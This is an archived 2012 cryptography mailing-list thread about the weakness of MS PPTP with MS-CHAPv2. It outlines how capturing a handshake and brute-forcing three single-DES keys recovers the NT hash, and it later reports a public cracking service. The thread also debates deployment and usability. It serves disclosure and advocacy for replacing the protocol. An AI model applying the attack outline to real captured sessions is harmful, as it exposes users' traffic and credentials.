Discussion:
MS PPTP MPPE only as secure as *single* DES
(too old to reply)
Marsh Ray
2012-04-03 19:29:18 UTC
Permalink
There is no Diffie-Hellman in the PPTP handshake. AFICT, the MS-CHAPv2
hashes are sent in the clear.

Per
http://www.schneier.com/paper-pptpv2.html
http://www.schneier.com/paper-pptpv2.pdf pg 5
4
MS-CHAPv2: Deriving the 24-byte Response
Both MS-CHAPv1 and MS-CHAPv2 use the same procedure to derive a 24-byte
1. The 16-byte NT hash is padded to 21 bytes by appending five zero bytes.
2. Let X, Y, Z be the three consecutive 7-byte blocks of this 21-byte value,
and let C be the 8-byte challenge. The 24-byte response R is calculated
as R = DESX (C), DESY (C), DESZ (C) .
The RFC seems to confirm this description.
DesEncrypt(
IN 8-octet Clear,
IN 7-octet Key,
OUT 8-octet Cypher )
...
ChallengeResponse(
IN 8-octet Challenge,
IN 16-octet PasswordHash,
OUT 24-octet Response )
{
Set ZPasswordHash to PasswordHash zero-padded to 21 octets
DesEncrypt( Challenge,
1st 7-octets of ZPasswordHash,
giving 1st 8-octets of Response )
DesEncrypt( Challenge,
2nd 7-octets of ZPasswordHash,
giving 2nd 8-octets of Response )
DesEncrypt( Challenge,
3rd 7-octets of ZPasswordHash,
giving 3rd 8-octets of Response )
}
Therefore, from any packet capture of a PPTP session which includes the
initial handshake, a brute force of the response
1DES(nthash[0..6], c)
|| 1DES(nthash[7..13], c)
|| 1DES(nthash[14..15] || '0' x 5, c)

yields the complete NT hash with complexity 2^57.

The NT hash is a password-equivalent, and it represents the only secret
material that goes into the MPPE encryption key derivation.

So MS PPTP + MS-CHAPv2 + MPPE can be no better than single DES, and a
break discloses your login credentials for use with other services.

Is anyone aware of this protocol having been fixed since the 1999 paper?

- Marsh
Marsh Ray
2012-04-05 08:55:32 UTC
Permalink
Wow the crickets are deafening tonight. :-)
Post by Marsh Ray
yields the complete NT hash with complexity 2^57.
The NT hash is a password-equivalent, and it represents the only secret
material that goes into the MPPE encryption key derivation.
So I point out that one of the most commonly-used VPN protocols is
completely ineffective and this is the reaction I get? Gee I expected
more from you guys. :-) It must be college basketball season or something.

Perhaps I just phrased it wrong. Let me try again:

Hey yall!
There's this here NSA backdoor still lingering around from the 1990's!
I guess we know what they wanted that big ole datacenter now for huh?

And the 51st state (Canada) is launchin a challenger to Bitcoin
http://developer.mintchipchallenge.com/index.php

Coincidence? Ha!

:-)

- Marsh
Ralf-Philipp Weinmann
2012-04-05 09:12:43 UTC
Permalink
Post by Marsh Ray
Wow the crickets are deafening tonight. :-)
Post by Marsh Ray
yields the complete NT hash with complexity 2^57.
The NT hash is a password-equivalent, and it represents the only secret
material that goes into the MPPE encryption key derivation.
So I point out that one of the most commonly-used VPN protocols is completely ineffective and this is the reaction I get? Gee I expected more from you guys. :-) It must be college basketball season or something.
Do you have statistics on that? I remember newer Microsoft and Apple operating systems supporting L2Sec quite well. And then there are the Cisco abominanations of IPSec that are quite common. But maybe not as common as SSL VPNs. And let's not forget OpenVPN for the geek faction. Where did you get the data that PPTP still is "one of the most commonly-used VPN protocols".

PPTP might be the path of least resistance in terms of setup, but I'm unsure about its current deployment rate.
Post by Marsh Ray
Hey yall!
There's this here NSA backdoor still lingering around from the 1990's!
I guess we know what they wanted that big ole datacenter now for huh?
Marsh, sorry, but that is ridiculous. A high-school kid with a couple of hard drives filled with rainbow tables will do as a valid stand-in for the attacker in your threat model. Heck, I'd guess there's even a Russian "cloud service" for this by now.

-Ralf
Marsh Ray
2012-04-05 17:06:14 UTC
Permalink
Post by Ralf-Philipp Weinmann
Do you have statistics on that? I remember newer Microsoft and Apple
operating systems supporting L2Sec quite well. And then there are the
Cisco abominanations of IPSec that are quite common. But maybe not as
common as SSL VPNs. And let's not forget OpenVPN for the geek
faction. Where did you get the data that PPTP still is "one of the
most commonly-used VPN protocols".
Honestly, it's been years since I messed with VPNs and I have not done
methodical research. I suspect VPN industry studies are likely to to be
skewed by selection bias (IT departments who are likely to spend spend
money on a real VPN).

Here's why I think PPTP is still in common use.

* PPTP is supported by Windows XP without any special client software.
So is L2TP/IPsec PSK, but that's not the kind of VPN that users log in
to. Most other solutions seem to involve the admin setting up a PKI
infrastructure. We all know how much fun that is.

* There's a plethora of HOWTO pages for VPNs that use PPTP. E.g.
http://www . chicagotech . net/vpnsetup.htm

* Some sources even treat PPTP as synonymous with VPNs:
http://www . sevenforums .
com/tutorials/4517-virtual-private-network-vpn-enable-incoming-vpn-connections.html
"How to Configure your Computer to Accept Incoming VPN Connections in
Windows 7 [...] Information This will show you how to configure your
computer to accept VPN connection and router settings to allow
Point-to-Point Tunneling Protocol (PPTP) on your Network in Windows 7."

* http://bandwidthcontroller . com/applicationPorts.html
"This table lists the ports used by some of the more popular applications."
PPTP is listed, L2TP/IPsec is not even mentioned.

* http://whatismyipaddress . com/vpn-service
"PPTP is the most common VPN protocol. It uses TCP port 1723 and Generic
Routing Encapsulation (GRE) to secure packets. The main advantage of
PPTP is that all major operating systems and many smartphones can
natively use PPTP without any additional software."

* http://www.wilderssecurity.com/showpost.php?p=1565325&postcount=19
"I'm reading and the only thing I've come across is that MS CHAP v1 is
badly broken and MS CHAP v2 is susceptible to dictionary attacks because
the keys are derived deterministically from the password."

* http://www.sans.org/security-resources/malwarefaq/pptp-vpn.php
Post by Ralf-Philipp Weinmann
Hey yall! There's this here NSA backdoor still lingering around
from the 1990's! I guess we know what they wanted that big ole
datacenter now for huh?
Marsh, sorry, but that is ridiculous.
Yes, it was a bit silly I admit :-)
Post by Ralf-Philipp Weinmann
A high-school kid with a couple
of hard drives filled with rainbow tables will do as a valid stand-in
for the attacker in your threat model. Heck, I'd guess there's even a
Russian "cloud service" for this by now.
I disagree.

There are users who are careful to choose really good passwords. There
are smart folks who are expecting this protocol to provide security
equivalent to the password, at least up to 128 bits. I have talked with
a few of them.

Here's a random example from the web:

http://www . net . princeton . edu/vpn/pptp.html
"If you connect using MS-CHAPv2 and are using a weak password, attackers
can use this tool to discover your password. As this tool relies on a
dictionary search, it should be possible to defend against it by
selecting an extremely strong OIT Windows password."

- Marsh
Peter Maxwell
2012-04-06 01:23:43 UTC
Permalink
Post by Marsh Ray
Post by Ralf-Philipp Weinmann
Do you have statistics on that? I remember newer Microsoft and Apple
operating systems supporting L2Sec quite well. And then there are the
Cisco abominanations of IPSec that are quite common. But maybe not as
common as SSL VPNs. And let's not forget OpenVPN for the geek
faction. Where did you get the data that PPTP still is "one of the
most commonly-used VPN protocols".
Honestly, it's been years since I messed with VPNs and I have not done
methodical research. I suspect VPN industry studies are likely to to be
skewed by selection bias (IT departments who are likely to spend spend
money on a real VPN).
There's two reasons I haven't commented on this (despite it being good
work):

i. I'm not familiar enough with PPTP, and always avoided it like the plague
anyway (and that was 10 years ago). Does dial-up not still generally use
MS-CHAPv2?

ii. There's only been once I've seen a company use PPTP for a VPN, and I
responded as any self-respecting sys-admin would... I laughed, took the
piss a bit, then fixed it. Anything else I've seen has been Cisco (IPSec
or SSL afaik), Checkpoint (IPSec?), more bog-standard IPSec setups and
OpenVPN. For that matter, I've seen companies use the sshd socks proxy as
a "VPN".
Ondrej Mikle
2012-04-06 13:46:08 UTC
Permalink
Post by Ralf-Philipp Weinmann
Do you have statistics on that? I remember newer Microsoft and Apple
operating systems supporting L2Sec quite well. And then there are the
Cisco abominanations of IPSec that are quite common. But maybe not as
common as SSL VPNs. And let's not forget OpenVPN for the geek
faction. Where did you get the data that PPTP still is "one of the
most commonly-used VPN protocols".
Honestly, it's been years since I messed with VPNs and I have not
done methodical research. I suspect VPN industry studies are likely
to to be skewed by selection bias (IT departments who are likely to
spend spend money on a real VPN).
There's two reasons I haven't commented on this (despite it being good
i. I'm not familiar enough with PPTP, and always avoided it like the
plague anyway (and that was 10 years ago). Does dial-up not still
generally use MS-CHAPv2?
Not sure about dialup, but in 802.1x the combination of PEAP/MSCHAPv2 is
still quite common (last seen about a week ago). Though without MitM-ing
the outer layer (PEAP) it'd be difficult to use the MSCHAPv2 attack
because the challenge is not in the clear, I guess.

On the other hand, there's only a handful of people that supply the
server cert for 802.1x, so MitM-ing shouldn't be hard in practice.

Ondrej
James A. Donald
2012-04-05 21:51:10 UTC
Permalink
Post by Marsh Ray
So I point out that one of the most commonly-used VPN protocols is
completely ineffective and this is the reaction I get? Gee I expected
more from you guys. :-)
Hey yall!
There's this here NSA backdoor still lingering around from the 1990's!
I guess we know what they wanted that big ole datacenter now for huh?
One of the most commonly-used VPN protocols is completely ineffective.
Also, the pope is Catholic, and bears shit in the wood.

When I set up a vpn, what usually happens is that the package offers me
two protocols, one that it deprecates as insecure (MS PPTP), and openvpn

The setup info or the web page tells me that MS PPTP has the great
advantage that it is built in to Microsoft, and the great disadvantage
that it is not secure.

So I think that pretty much everyone has already heard that MS PPTP is
insecure. Every time I set up a vpn, I am re-reminded, just in case.
Brian Keefer
2012-04-05 22:30:15 UTC
Permalink
Post by Marsh Ray
So I point out that one of the most commonly-used VPN protocols is
completely ineffective and this is the reaction I get? Gee I expected
more from you guys. :-)
Hey yall!
There's this here NSA backdoor still lingering around from the 1990's!
I guess we know what they wanted that big ole datacenter now for huh?
One of the most commonly-used VPN protocols is completely ineffective. Also, the pope is Catholic, and bears shit in the wood.
When I set up a vpn, what usually happens is that the package offers me two protocols, one that it deprecates as insecure (MS PPTP), and openvpn
The setup info or the web page tells me that MS PPTP has the great advantage that it is built in to Microsoft, and the great disadvantage that it is not secure.
So I think that pretty much everyone has already heard that MS PPTP is insecure. Every time I set up a vpn, I am re-reminded, just in case.
Perhaps we're overlooking the fact that vast majority of Small & Medium Business VPN implementations are done by hassled IT people, not security experts who care enough to sign up for encryption mailing lists.

Perhaps someone should Scan The Internet(TM) for PPTP (1723/TCP). I assure you it's still very much alive.

Edit: Just did a string search on Shodan (free account) and it returned 240 results for "pptp." Keep in mind that's just in http/ftp server headers/banners, snmp attributes, etc. SFAIK it doesn't index other ports.

PS People "know" passwords are insecure too, but 'password1' is everywhere.

--
bk
Steven Bellovin
2012-04-06 00:57:14 UTC
Permalink
Post by Marsh Ray
So I point out that one of the most commonly-used VPN protocols is
completely ineffective and this is the reaction I get? Gee I expected
more from you guys. :-)
Hey yall!
There's this here NSA backdoor still lingering around from the 1990's!
I guess we know what they wanted that big ole datacenter now for huh?
One of the most commonly-used VPN protocols is completely ineffective. Also, the pope is Catholic, and bears shit in the wood.
When I set up a vpn, what usually happens is that the package offers me two protocols, one that it deprecates as insecure (MS PPTP), and openvpn
The setup info or the web page tells me that MS PPTP has the great advantage that it is built in to Microsoft, and the great disadvantage that it is not secure.
So I think that pretty much everyone has already heard that MS PPTP is insecure. Every time I set up a vpn, I am re-reminded, just in case.
"Don't use cryptographic overkill. Even bad crypto is usually the strong part of the system." Adi Shamir, 1995. (http://www.ieee-security.org/Cipher/ConfReports/conf-rep-Crypto95.html)

--Steve Bellovin, https://www.cs.columbia.edu/~smb
ianG
2012-04-08 11:30:43 UTC
Permalink
Post by Steven Bellovin
So I think that pretty much everyone has already heard that MS PPTP is insecure. Every time I set up a vpn, I am re-reminded, just in case.
"Don't use cryptographic overkill. Even bad crypto is usually the strong part of the system." Adi Shamir, 1995. (http://www.ieee-security.org/Cipher/ConfReports/conf-rep-Crypto95.html)
All hail the great A5/1 and lesser spawn.

Seriously though, we suffer tremendously in this industry from overkill.
Studying the biases in the field would make a great cross-over PhD in
psych-CS-crypto-business. Is there anyone amongst us who hasn't
chortled with glibbity and glee when some despised crypto system falls
to a pernickity academic attack?

In order to replace the myth that crypto must be perfect, maybe we need
a countervailing myth? Something like (whiteboarding here):

A finely balanced choice is as much an opportunity
to measure ones attacker [0], as a way to preserve and
reward a future generation of architects.

Call it the easter egg theory of crypto-plumbing? Gotta lay down some
chocolate to keep new bunnies hopping...



iang



[0] Dan Geer's delta argument.
Steven Bellovin
2012-04-08 23:15:43 UTC
Permalink
Post by ianG
Post by Steven Bellovin
So I think that pretty much everyone has already heard that MS PPTP is insecure. Every time I set up a vpn, I am re-reminded, just in case.
"Don't use cryptographic overkill. Even bad crypto is usually the strong part of the system." Adi Shamir, 1995. (http://www.ieee-security.org/Cipher/ConfReports/conf-rep-Crypto95.html)
All hail the great A5/1 and lesser spawn.
Seriously though, we suffer tremendously in this industry from overkill. Studying the biases in the field would make a great cross-over PhD in psych-CS-crypto-business. Is there anyone amongst us who hasn't chortled with glibbity and glee when some despised crypto system falls to a pernickity academic attack?
Sure -- and I (and many others on this list) have worked hard for good, secure crypto standards. But thinks like PPTP, even when flawed, have survived for a reason. Often, the reason is that they're far more *usable* than the stronger alternatives. Let's take openvpn, which some others have spoken favorably of in this thread. Consider http://openvpn.net/index.php/open-source/documentation/howto.html (and especially http://openvpn.net/index.php/open-source/documentation/howto.html#examples), the "official" starting points. Then contrast that with what a typical sysadmin has to know to set up PPTP. Yes, I understand why openvpn has a harder job, though I do think that a fair amount of the complexity could be hidden by (a) a bit more management software, and (b) the developers making certain decisions (and hence taking them away from the sysadmin). Both of those take a great deal of taste to do correctly, of course.

IPsec is often worse. Take a look at, say, http://www.freebsd.org/doc/en_US.ISO8859-1/articles/checkpoint/racoon.html, or the man page at http://www.linuxmanpages.com/man5/racoon.conf.5.php . There's a fearsome amount you have to wade through just to decide that you don't need to touch, say, the "nonce_size" option. More substantively, how many hours will it take the typical sysadmin to understand the description of the "generate_policy" option?

So -- you're the typical sysadmin. You can spend many hours trying to understand all that stuff, or you can click through a very few screens and get crypto that will certainly deter the casual adversary at the local hotspot, will block even the NSA's vacuum cleaners -- and if you're targeted, might not be the weak point after all, since exploiting bad crypto depends at a minimum on actually picking up the traffic of interested, while a host exploit is always there.

Yes, the algorithms and protocols can be very important, especially if you have serious enemies. They're also more fun for many folks (myself included) than the really hard engineering and development work to make the thing usable. They're orders of magnitude more fun than the arguments in standards bodies to agree on what is really necessary as an option, as opposed to something that most people don't want but some vendor insists has to be there for 2.71828% of their customer base.



--Steve Bellovin, https://www.cs.columbia.edu/~smb
James A. Donald
2012-04-08 23:49:04 UTC
Permalink
Post by Steven Bellovin
Yes, the algorithms and protocols can be very important,
especially if you have serious enemies. They're also more
fun for many folks (myself included) than the really hard
engineering and development work to make the thing usable.
They're orders of magnitude more fun than the arguments in
standards bodies to agree on what is really necessary as an
option, as opposed to something that most people don't want
but some vendor insists has to be there for 2.71828% of
their customer base.
Seems to me that most crypto failure is usability failure.
The only massive protocol and algorithm failure is wifi.

Also, anything that comes out of a committee, particularly a
large committee containing conflicting agendas, evil people,
stupid people, and crazy people, is apt to be a massive
usability fail, and the only reason why it is usually not
also a massive algorithm and protocol fail is that the
stupid, the crazy, and the evil have difficulty following the
protocol and algorithm discussion.
Steven Bellovin
2012-04-09 00:17:58 UTC
Permalink
Post by James A. Donald
Post by Steven Bellovin
Yes, the algorithms and protocols can be very important,
especially if you have serious enemies. They're also more
fun for many folks (myself included) than the really hard
engineering and development work to make the thing usable.
They're orders of magnitude more fun than the arguments in
standards bodies to agree on what is really necessary as an
option, as opposed to something that most people don't want
but some vendor insists has to be there for 2.71828% of
their customer base.
Seems to me that most crypto failure is usability failure.
The only massive protocol and algorithm failure is wifi.
Yup. Even there, the problem that got most of the attention
-- the fact that RC4 (as used in WEP) can be cryptanalyzed --
wasn't knowable at the time. The avoidable errors -- the
misuse of a stream cipher, and the lack of a standardized
key management layer -- were not enough to prompt a change
in the standard.
Post by James A. Donald
Also, anything that comes out of a committee, particularly a
large committee containing conflicting agendas, evil people,
stupid people, and crazy people, is apt to be a massive
usability fail, and the only reason why it is usually not
also a massive algorithm and protocol fail is that the
stupid, the crazy, and the evil have difficulty following the
protocol and algorithm discussion.
I'd put most of it down to conflicting agendas -- even people
you regard as "evil" don't see themselves that way; they
simply have a different definition -- agenda -- for "good".
Craziness doesn't generally survive, nor stupidity. Granted,
some folks with different agendas may (or may not) understand
certain details, but if they don't it's because that isn't
important to their employers' agendas.

One more thing: algorithm and protocol failures are often a
matter of fact, not opinion, and most people are reluctant
to argue for something that everyone else can see is factually
incorrect. I recall one incident when I was Security Area Director
in the IETF when I blocked some SIP documents because of a
cut-and-paste attack. I had a very hostile meeting with a fair
number of the proponents of those documents -- until I pulled
out my laptop and showed exactly how the attack worked. End
of discussion, period. One can disagree on the likelihood or
impact of a vulnerability, but generally not its existence,
until the audience is politicians. (The disagreements, circa
the late 1970s, on the susceptibility of DES to an economically
feasible brute force attack come to mind.) The trouble comes
when it gets to matters of taste and judgment, and what adding
17.3 new features to the protocol will do to the software's
correctness and comprehensibility.


--Steve Bellovin, https://www.cs.columbia.edu/~smb
James A. Donald
2012-04-09 03:33:09 UTC
Permalink
Post by Steven Bellovin
I'd put most of it down to conflicting agendas -- even people
you regard as "evil" don't see themselves that way; they
simply have a different definition -- agenda -- for "good".
An agenda which requires them to lie about what they believe, stack
committees, falsify the evidence, and personally destroy, Alinsky style,
those who mention inconvenient truths.
Post by Steven Bellovin
One can disagree on the likelihood or
impact of a vulnerability, but generally not its existence,
until the audience is politicians.
The probability that the audience is politicians tends to increase with
the size of the meeting.
ianG
2012-04-11 01:37:39 UTC
Permalink
Post by James A. Donald
Post by Steven Bellovin
I'd put most of it down to conflicting agendas -- even people
you regard as "evil" don't see themselves that way; they
simply have a different definition -- agenda -- for "good".
An agenda which requires them to lie about what they believe, stack
committees, falsify the evidence, and personally destroy, Alinsky style,
those who mention inconvenient truths.
I think there is a widespread misconception about committees. People
think they are there to create good results. I think that is wrong. I
think they are there to stop outright wars in foisting bad results on an
unwitting public.

As a step up from outright commercial war, if they can be kept polite
and safe then that's as much as we can expect. The fact that companies
are likely to send their best (cough) "politicians" into the committee
to get their deals is a given.

It's what they get paid for. You asking for something different is
perhaps your error.
Post by James A. Donald
Post by Steven Bellovin
One can disagree on the likelihood or
impact of a vulnerability, but generally not its existence,
until the audience is politicians.
The probability that the audience is politicians tends to increase with
the size of the meeting.
Even a committee of 2 requires delicate political skills... :) Beyond
2, calling it "political" is perhaps being overly polite with the truth.



iang
Marsh Ray
2012-07-31 00:41:49 UTC
Permalink
Post by Marsh Ray
Therefore, from any packet capture of a PPTP session which includes the
initial handshake, a brute force of the response yields the complete NT
hash with complexity 2^57.
The NT hash is a password-equivalent, and it represents the only secret
material that goes into the MPPE encryption key derivation.
So MS PPTP + MS-CHAPv2 + MPPE can be no better than single DES, and a
break discloses your login credentials for use with other services.
An update:

Moxie Marlinspike and David Hulton have improved the attack from 2^57 to
2^56.

Two days ago at Defcon 20 they released open source software for parsing
network captures for any MS-CHAPv2 handshakes and an online service
using a Pico Computing FPGA cluster to reverse the NT hash. This allows
decrypting a captured PPTP session or logging in as the user in about
half a day on average.

https://www.defcon.org/html/defcon-20/dc-20-speakers.html#Marlinspike
https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/

On Monday, Jacob Applebaum and I will be presenting our "vpwns: Virtual
Pwned Networks" paper at Usenix FOCI '12. It discusses the limitations
of off-the-shelf VPN systems when used for user anonymity and censorship
resistance. PPTP is a common choice for these systems, so we'll take the
opportunity to reiterate the inherent weakness in MS-CHAPv2.

https://www.usenix.org/conference/foci12/vpwns-virtual-pwned-networks

This is a good opportunity for everyone to make a contribution to
practical crypto. Anyone that can pitch in, let's do a full-court press
on lobbying for the wholesale replacement for MS-CHAPv2 and to raise
awareness of the decryptability of PPTP. We could use blog posts, press
articles, tweets, etc.

Let's make this the week that the whole industry realizes that vendors
shipping these protocols are continuing to sell crummy sub-standard
single-DES crypto products which don't conform to modern security
requirements.

- Marsh
Harald Hanche-Olsen
2012-08-01 11:23:26 UTC
Permalink
This story is on Ars Technica today, where it might get a bit more exposure:

http://arstechnica.com/security/2012/07/broken-microsoft-sheme-exposes-traffic/

- Harald

Marsh Ray
2012-07-30 22:12:53 UTC
Permalink
Post by Marsh Ray
Therefore, from any packet capture of a PPTP session which includes the
initial handshake, a brute force of the response yields the complete NT
hash with complexity 2^57.
The NT hash is a password-equivalent, and it represents the only secret
material that goes into the MPPE encryption key derivation.
So MS PPTP + MS-CHAPv2 + MPPE can be no better than single DES, and a
break discloses your login credentials for use with other services.
An update:

Moxie Marlinspike and David Hulton have improved the attack from 2^57 to
2^56.

Two days ago at Defcon 20 they released open source software for parsing
network captures for any MS-CHAPv2 handshakes and an online service
using a Pico Computing FPGA cluster to reverse the NT hash. This allows
decrypting a captured PPTP session or logging in as the user in about
half a day on average.

https://www.defcon.org/html/defcon-20/dc-20-speakers.html#Marlinspike
https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/

On Monday, Jacob Applebaum and I will be presenting our "vpwns: Virtual
Pwned Networks" paper at Usenix FOCI '12. It discusses the limitations
of off-the-shelf VPN systems when used for user anonymity and censorship
resistance. PPTP is a common choice for these systems, so we'll take the
opportunity to reiterate the inherent weakness in MS-CHAPv2.

https://www.usenix.org/conference/foci12/vpwns-virtual-pwned-networks

This is a good opportunity for everyone to make a contribution to
practical crypto. Anyone that can pitch in, let's do a full-court press
on lobbying for the wholesale replacement for MS-CHAPv2 and to raise
awareness of the decryptability of PPTP. We could use blog posts, press
articles, tweets, etc.

Let's make this the week that the whole industry realizes that vendors
shipping these protocols are continuing to sell crummy sub-standard
single-DES crypto products which don't conform to modern security
requirements.

- Marsh
Loading...